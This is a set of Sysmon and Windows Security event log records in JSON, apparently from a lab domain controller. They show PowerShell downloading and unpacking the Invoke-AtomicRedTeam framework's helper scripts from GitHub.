{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4645,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.798\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yyzn5h01.u0z.ps1\r\nCreationUtcTime: 2020-08-01 07:58:56.798","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.798","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yyzn5h01.u0z.ps1","CreationUtcTime":"2020-08-01 07:58:56.798","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4646,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.845\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.845","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-001025EA0600}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4647,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.845\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.845","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-001025EA0600}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4648,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.924\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nQueryName: raw.githubusercontent.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 github.map.fastly.net;::ffff:199.232.64.133;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.924","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","QueryName":"raw.githubusercontent.com","QueryStatus":"0","QueryResults":"type:  5 github.map.fastly.net;::ffff:199.232.64.133;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220520,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65BBD\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x65bbd","LogonType":"3","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4649,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.938\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50154\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 199.232.64.133\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.938","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50154","DestinationIsIpv6":"false","DestinationIp":"199.232.64.133","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4650,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.970\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\AtomicClassSchema.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.970","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.970","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\AtomicClassSchema.ps1","CreationUtcTime":"2020-08-01 07:58:58.970","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4651,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.970\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-PrereqExecutor.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.970","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.970","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-PrereqExecutor.ps1","CreationUtcTime":"2020-08-01 07:58:58.970","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4652,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.970\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-TargetInfo.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.970","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.970","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Get-TargetInfo.ps1","CreationUtcTime":"2020-08-01 07:58:58.970","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4653,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.970\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-CheckPrereqs.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.970","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.970","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-CheckPrereqs.ps1","CreationUtcTime":"2020-08-01 07:58:58.970","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4654,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-ExecuteCommand.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-ExecuteCommand.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4655,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-KillProcessTree.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-KillProcessTree.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4656,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-Process.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Invoke-Process.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4657,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Replace-InputArgs.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Replace-InputArgs.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4658,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Show-Details.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Show-Details.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4659,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-ExecutionLog.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-ExecutionLog.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
